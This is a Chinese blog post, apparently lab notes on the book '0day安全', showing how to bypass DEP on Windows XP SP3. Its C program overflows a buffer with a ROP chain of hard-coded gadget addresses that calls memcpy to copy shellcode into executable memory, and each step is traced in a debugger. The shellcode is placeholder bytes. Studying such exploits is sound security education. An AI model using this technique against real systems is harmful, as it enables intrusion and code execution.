0day 第12章--12.4节:利用可执行内存挑战DEP

最新推荐文章于 2022-11-24 20:10:09 发布
最新推荐文章于 2022-11-24 20:10:09 发布
阅读量342 收藏 1
点赞数 1
分类专栏: 0day
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_15727809/article/details/89071631
版权

实验环境:
winxp sp3
vs2010

实验配置:
关闭DEP、GS、SAFESEH,禁用优化,release版本

思路:
如果进程的内存空间中有一段可读可写可执行的内存,而我们将shellcode复制到该内存,并劫持程序流程,则我们的shellcode就有执行的机会。

具体实施:
利用memcpy函数将shellcode复制到该段内存。
memcpy函数的部署可参考上一节

1、首先找到一段可读可写可执行的内存
点击M按钮,发现没有这样的内存。于是,我们选中0x00160000该段内存,修改访问属性。右键->设置访问->所有访问
在这里插入图片描述
(最初我选择0x00150000段内存,发现运行memcpy时会报错,因此改为0x00160000)
2、依然还是利用push esp jmp eax和pop retn 指令填充memcpy的两个函数地址,并利用pop pop retn收回程序的控制权,使其跳转到memcpy函数内部执行。当然还需要修复ebp
因此,shellcode布局如下:

#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
#include<string.h>


char shell[]={"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x3c\x43\xa6\x7d" // pop eax retn
"\xae\x13\x67\x7d" // eax指向的值,即pop pop retn指令
"\x85\x8b\x1d\x5d" // 修复EBP
"\x0c\xde\xce\x7d" // pop ecx retn
"\x00\x00\x16\x00" // memcpy的返回地址
"\x00\x00\x16\x00" // memcpy的第一个参数,目标内存地址
"\xc6\xc6\xeb\x77" // push esp jmp eax &原-始º?shellcode地Ì?址¡¤
"\xff\x00\x00\00"  // shellcode长度
"\xb8\x1d\x92\x7c" // memcpy入口地址
"\x42\x42\x42\x42" // shellcode
"\x42\x42\x42\x42"
"\x42\x42\x42\x42"
"\x42\x42\x42\x42"
"\x42\x42\x42\x42"
};

int test()
{
	printf("OK!");
	char array[4]={0};
	memcpy(array,shell,sizeof(shell)+1);
	return 0;
}

int main()
{
	HMODULE hMod = LoadLibrary(L"shell32.dll");
	test();
	return 0;
}

1、OD载入运行,程序首先执行0x7DA6433C处的pop eax retn指令
在这里插入图片描述
并将0x7D6713AE处的pop pop retn指令传给eax
在这里插入图片描述
2、接着执行0x5D1D8B85处的的push esp pop ebp retn指令修复ebp
在这里插入图片描述
3、接着执行0x7DCEDE0C处的pop retn指令,将memcpy的第一个参数压栈
在这里插入图片描述
4、接着执行0x77EBC6C6处的push esp jmp eax指令,将Memcpy的第三个参数压栈
在这里插入图片描述
在这里插入图片描述
5、接着跳转到pop pop retn指令处,
在这里插入图片描述
6、执行完后,将跳转到0x7C921DB8处的Memcpy函数
在这里插入图片描述
7、执行完memcpy函数后,将转到0x00160000内存处执行
在这里插入图片描述
8、我们发现我们的shellcode开始的位置在0x00160008位置处,因此我们将memcpy的返回地址改为0x00160008即可。

Angelki
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《0day安全》——数据与程序的分水岭:DEP
sunr_的博客
08-31 491
DEP机制的保护原理 溢出攻击的根源在于区分不了代码与数据。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时,程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 DEP 的主要作用是阻止数据页(如默认的堆页、各种堆栈页以及内存池页)执行代码。微软从 Windows XP SP2 开始提供这种技术支持,根据实现的机制不同可分为:软件 DEP( Software DEP)和硬件 DEP( Hardware-enforced DEP
ret2lib bypass dep 学习笔记(0day2Edition NtSetInformationProcess)
Catch me if you can
04-21 2335
DEP绕过ROP(ret2lib)技术总结样本空间测试环境 操作系统:windows xp sp3 工具:immunity debugger 样本源码: #include <stdio.h> #include <string.h> #include <windows.h> char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x
9.5 利用执行内存挑战DEP
qq_55202378的博客
11-24 767
DEP
记录学习《0Day安全》路上遇到的问题解决方案 利用Ret2Libc挑战DEP
Z_LiT0的博客
05-03 794
if __author__ == "LiT0":0x00 前言在此中,首次碰到书本上的错误(大神勿喷,请看完全文。按照我的思路执行成功) 具体在12.3.1 关于利用ZwSetInformationProcess 的实践实验。实验了一晚上,按照书上一步步来总是出错。经过认真研究发现了一处错误。 系统环境与书上一致 xp sp3 && vc++ 没有gs 和 safeseh 0x01
逆向之路(一) 代码空白区添加代码
Snippers的博客
03-09 1670
这是人生中第一篇博客,记录逆向之路的开始,以便多年后能看到自己的成长,希望那时可以成为一个让自己看得起的人。好了废话不多说,开始正文。代码空白区添加代码,以添加MessageBox为例:1..获取MessageBox地址,构造shellcode代码:OD-&gt;bp MessageBoxA-&gt;break断点有user32.dll的程序有MessageBox确定MessageBox的真正地...
next-missing-terser-webpack-plugin-dep:缺少terser-webpack-plugin的示例回购
04-08
安装部门。 然后运行yarn build % yarn buildyarn run v1.22.10$ next build> Build error occurredError: Cannot find module 'terser-webpack-plugin'Require stack:- my-app-yarn/node_modules/next-pwa/build-...
gulp-framework-dep:可配置的动态安装框架 Bower 依赖项
06-24
gulp-framework-dep 可配置的动态安装框架 Bower 依赖项。 gulp-framework-dep 是 gulp-angular-dep 的改进和任意版本。用法首先,安装gulp-framework-dep作为开发依赖: npm install --save gulp-framework-dep ...
go-whatsapp-rest:在REST API中执行WhatsApp实施
02-05
在REST API中执行WhatsApp实施 该存储库包含实施软件包的示例。 此示例使用。 入门 这些说明将为您提供在本地计算机上运行并运行的项目的副本,以进行开发和测试。 有关如何在实时系统上部署项目的注释,请参阅部署...
github-demo-hoang-dep-trai:嗨
05-28
【标题】"github-demo-hoang-dep-trai:嗨" 暗示这是一个在GitHub上的项目演示,可能由用户hoang-dep-trai创建,用于展示或学习JavaScript技术。项目名称中的“demo”通常意味着它包含了一些示例代码或者教程,供他人...
dep-configured-imports:针对可配置导入的 Dart 增强建议
06-22
在Dart编程语言中,`dep-configured-imports`是一个重要的概念,它涉及到如何更高效地管理和使用项目中的依赖项。这个概念的核心是允许开发者根据特定的配置来决定哪些库或者模块应该被导入。这样的机制使得代码更加...
数据执行保护DEP
u010654697的专栏
08-14 1265
由于许多通用的漏洞利用方法和大量的蠕虫! 微软决定在硬件层和软件层加入内存保护。所以从windows XP SP2 (Windows XP Tablet PC Edition 2005) , Windows Server 2003 Service Pack 1 (OS level) 开始、从 visual studio 2003 (编译器方面)开始加入了许多内存保护功能。 我简单的介绍下
如何关闭VS的DEP保护(数据执行保护)
大头的博客
07-26 6737
今天看到0day安全中栈溢出的示例,手痒就学习,程序在一波 函数中修改函数返回地址跳到栈区去执行代码,而在DEP保护开启情况下堆和栈是无法执行代码,这也是缓冲区溢出保护机制之一。 在一番太头疼之后终于在VS项目--》属性一堆长长的设置中找到“数据执行保护”的字样 他藏在了项目--》属性--》链接器--》高级--》数据执行保护(DEP)  设置为 否 (/NXCOMPAT:NO) 美滋滋 这...
0day 第12章--12.3.1:Ret2Libc 实战之利用ZwSetInformationProcess
I have a dream
02-21 766
12.3.1 利用Ret2Libc挑战DEP 思想:通过跳转到 ZwSetInformationProcess 函数将DEP关闭后再转入shellcode 执行。 核心:利用LdrpCheckNXCompatibility函数检查SafeDisc来关闭DEP的流程。 核心是0x7C93CD24行代码,检查al是否等于1,如果等于1则执行关闭DEP的流程。 思路:由于DEP开启,堆栈不能直接写入,...
以jmp esp 为跳板的shellcode开发
##
11-25 1万+
0x00 Shellcode概述 Shellcode与exploit 1) shellcode:缓冲区攻击中植入进程的代码。进行删改文件、窃取数据、上传木马并运行、格式话硬盘等。用汇编语言编写,并转换成二进制机器码,内容和长度受到苛刻限制。 2) exploit: 漏洞利用程序,用于生成攻击性的网络数据包或其他形式的攻击性输入。exploit的核心是淹没返回地址,劫持进程控制权,跳去执行shel
[汇编]汇编学习笔记(1):push,pop,call,jmp,retn
学习之路
08-16 5384
不知道为啥,学啥后面都会碰到汇编指令┑( ̄Д  ̄)┍,看书学习DirectX引擎开发(才第4章)也要碰到,怒了,开始刚汇编,记录一些学习上的问题,好回头看看。ESP:栈指针寄存器(extended stack pointer),永远指向系统栈最上面一个栈帧的栈顶 EIP:指令寄存器,存放当前指令的下一条指令的地址(就是CPU从这边开始执行) push指令:把值压入栈中,ESP栈指...
《Windows安全机制》之DEP(数据执行保护)
weixin_43742894的博客
06-02 5609
Windows安全机制第二弹——DEP保护,上一篇《Windows安全机制——ASLR(地址随机化)及如何关闭ASLR》,地址如下:https://blog.csdn.net/weixin_43742894/article/details/105702886 ...
Windows 缓冲区溢出与数据执行保护DEP
热门推荐
MoreWindows Blog
10-19 2万+
缓冲区溢出与数据执行保护DEP介绍先看一个缓冲区溢出的C++实例程序,代码如下(VC6.0下编译通过): //by MoreWindows #include #include #include #include #include void foo(const char *input) { char buf[4]; //buf 占4字,后4字为ebp,再后4个字为返回地址。
漏洞利用原理(高级)
wk19951125的博客
08-27 606
数据与程序的分水岭:DEPDEP机制的保护原理利用Ret2Libc挑战DEPRet2Libc实战之利用ZwSetInformationProcessRet2Libc实战之利用VirtualProtect DEP机制的保护原理 DEP的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU会抛出异常。 DEP按实现机制的不同,分为...
windows安全机制
moshangyanyuyao的专栏
12-14 3558
1.GS安全编译原理选项的保护 攻击方法: 利用未被保护的内存突破GS; 覆盖虚函数突破GS; 将虚函数的调用地址改为自己的地址 攻击异常处理突破GS; char buf[200]; strcpy(buf,input); strcat(buf,input); 覆盖异常处理函数调用地址,在异常发生时调用自己的代码 同时替换栈中和
2023-04-12 13:49:26 0 [warning] timestamp with implicit default value is dep
最新发布
08-30
这是一条警告信息,提示在2023年4月12日13:49:26的某个操作中,使用了具有隐含默认值的时间戳。这个警告意味着在使用时间戳时,没有明确指定时间戳的值,系统会自动赋予一个默认值。在数据库或编程中,时间戳常用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值